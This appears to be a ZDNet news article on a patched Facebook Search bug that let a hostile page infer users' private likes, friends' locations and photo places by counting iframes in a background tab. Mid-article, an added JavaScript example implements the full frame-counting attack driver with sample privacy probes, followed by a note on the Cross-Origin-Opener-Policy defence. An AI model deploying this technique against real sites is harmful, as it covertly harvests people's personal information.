ZDNet | Security

Facebook patches another bug that could have allowed mass-harvesting of user data

Facebook engineers have fixed another bug in the social network's codebase that could have let an attacker stealthily collect highly personal information about Facebook users.

In an email exchange with ZDNet, Imperva’s Ron Masas, the security researcher who discovered the issue, says the bug resided in Facebook’s Search system.

“I browsed Facebook’s online search results, and in their HTML noticed that each result contained an iframe element — probably used for Facebook’s own internal tracking,” Masas said.

The researcher says that upon seeing this, he realized that checking whether a search results page contained that iframe told him whether the query had returned any results.

Using basic yes-or-no questions built on that check, Masas says he could infer whether a user had liked a particular page, had taken photos at certain geographical locations, had friends of a certain religion, had shared posts containing specific text, had friends with a particular name, had friends living in a specific city or country, and many other highly sensitive details.

Even where these queries did not expose fine-grained details, they exposed second-hand information that, pieced together, could reveal the identity of a user and of his circle of friends.

But some of this information is visible only to the user himself, so an attacker cannot simply run these queries against the public Facebook Search feature; they have to be run from inside the victim's own logged-in session.

To get around this limitation, Masas created a malicious web page to which an attacker could lure users. Once the user interacts with the page in any way, such as scrolling or clicking (browsers only allow a page to open new windows from such a user gesture), the page runs JavaScript that opens a new tab and automates the search queries there, in the victim's browser and therefore with the victim's Facebook session.

Masas told ZDNet that an attacker could use a technique called "tab under" to open the Facebook Search page in a background tab while the user's focus stays on the main malicious page, which could be disguised as an online game, movie streaming portal, or news article.

Since the tab-under technique is regularly used nowadays to push intrusive online ads, most users wouldn't even pay attention to a new tab opening in the background, taking it for just another ad.

While the user is interacting with the malicious page, Masas' script would load a series of Facebook search URLs in that background tab, count the iframes in each result page through the "fb.frames.length" property (fb being the window handle the attacker page holds for the tab; browsers let the opener read a cross-origin window's frame count even though they block access to its content), and log the results. The researcher shared a video of the attack while it was still possible.

The attack would not work if the user has only two or three tabs open in a desktop browser and notices a new Facebook tab appear, but since most users keep a large number of tabs open, there is a high chance they won't see the attack going on, especially while focused on the attacker's page, which is easy to arrange if the page delivers a game, news article, or video.

Further, the attack is likely to be even more effective on mobile devices, where open tabs aren't visible on screen, only as a tab counter that is often ignored.

Masas told ZDNet that his attack worked in all browsers and was not limited to Chrome, unlike a previous Facebook bug he found in August.

Furthermore, the attack doesn't need a separate tab for each search query: the attacker can reuse the single background tab by loading a new search URL into it at short intervals.
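The sequence described above (open one background tab, load a search URL, read the frame count, move on to the next query) can be modelled in a few dozen lines. What follows is an added example written for this page, not code from the article or from Imperva's disclosure. The search URL shape, the probe questions, the calibration query and the fake target data are all made up for the example; the article gives no query syntax. The only browser fact it relies on is that the handle window.open() returns for a cross-origin page still exposes frames.length to the opener.

```javascript
// Added example, not code from the article or from Imperva's disclosure.
// It models the frame-counting oracle the article describes. The handle
// window.open() returns for a cross-origin page still exposes `frames.length`
// to the opener (it is on the HTML spec's list of cross-origin-readable
// window properties), so an attacker page can load search URLs in one reused
// background tab and learn whether each result page carries an iframe.
// Assumptions: the search URL shape, the probe questions and the fake target
// below are made up for the example; the article gives no query syntax.

const SEARCH_BASE = "https://www.facebook.com/search/?q="; // hypothetical shape

function buildSearchUrl(query) {
  return SEARCH_BASE + encodeURIComponent(query);
}

// Drives one background tab through a list of yes/no probes. The first load is
// a calibration query assumed to return nothing; its iframe count becomes the
// baseline, so an answer is "count rose above the baseline", not "count > 0",
// in case the result page carries iframes unrelated to hits (an assumption;
// the article only says a hit added an iframe).
class FrameCountOracle {
  constructor(probes, emptyQuery) {
    this.queue = [{ id: "__baseline", query: emptyQuery }].concat(probes);
    this.current = null;
    this.baseline = null;
    this.answers = {};
  }

  // URL to navigate the tab to next, or null once every probe has been asked.
  nextUrl() {
    this.current = this.queue.shift() || null;
    return this.current ? buildSearchUrl(this.current.query) : null;
  }

  // Record frames.length as read from the tab for the URL loaded last.
  record(frameCount) {
    if (!this.current) throw new Error("record() called before nextUrl()");
    if (this.current.id === "__baseline") {
      this.baseline = frameCount;
    } else {
      this.answers[this.current.id] = frameCount > this.baseline;
    }
  }
}

// Browser driver. Must run from a click or scroll handler: browsers only let
// a page open a new window from a user gesture. window.focus() pulls focus
// back to this page (the "tab under"); the new tab stays in the background.
// A cross-origin load event is not observable, so the count is sampled on a
// fixed interval; sample too early and a half-built page is misclassified.
function runInBrowser(oracle, intervalMs = 1500) {
  const tab = window.open(oracle.nextUrl(), "_blank");
  if (!tab) throw new Error("popup blocked: call this from a user gesture");
  window.focus();
  const timer = setInterval(() => {
    oracle.record(tab.frames.length); // readable across origins
    const url = oracle.nextUrl();
    if (url === null) {
      clearInterval(timer);
      tab.close();
      return;
    }
    tab.location = url; // reuse the same tab for the next query
  }, intervalMs);
  return oracle;
}

// Offline simulation against a constructed target: fakeFrameCounts maps each
// query to the number of iframes its result page would contain (constructed
// data, not measurements). Returns the inferred yes/no answers by probe id.
function simulate(probes, emptyQuery, fakeFrameCounts) {
  const oracle = new FrameCountOracle(probes, emptyQuery);
  for (let url = oracle.nextUrl(); url !== null; url = oracle.nextUrl()) {
    const query = decodeURIComponent(url.slice(SEARCH_BASE.length));
    oracle.record(fakeFrameCounts[query] || 0);
  }
  return oracle.answers;
}

const PROBES = [
  { id: "likesPageX", query: "my friends who like Page X" },
  { id: "friendInParis", query: "my friends who live in Paris" },
  { id: "photoAtVenueY", query: "photos of me taken at Venue Y" },
];
const EMPTY_QUERY = "zzqx-no-such-term-0000"; // assumed to match nothing
const FAKE_TARGET = {
  "zzqx-no-such-term-0000": 1, // empty result page still carries one iframe
  "my friends who like Page X": 2,
  "my friends who live in Paris": 1,
  "photos of me taken at Venue Y": 3,
};

if (typeof window === "undefined") {
  console.log(simulate(PROBES, EMPTY_QUERY, FAKE_TARGET));
}
```

Running the file under Node prints the inferred answers for the constructed target; in a browser, runInBrowser would drive the real loop from a click handler. Whatever form Facebook's fix took, the general defence against this class of leak is to stop the opener from learning anything about the opened page: a site that sends Cross-Origin-Opener-Policy: same-origin has its documents placed in their own browsing context group, so the attacker's handle reports closed and a frames.length of 0, and frame counting (one of the techniques catalogued under XS-Leaks) yields nothing.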

In a blog post today, Masas says he reported the bug to Facebook in May this year and that the platform rolled out fixes shortly after.

The researcher's findings show that despite its expansive bug bounty program, Facebook will always have a hard time securing such a huge platform and will remain exposed to mass-harvesting operations, such as the Cambridge Analytica scandal or the recent security breach caused by another platform feature, the View As button.
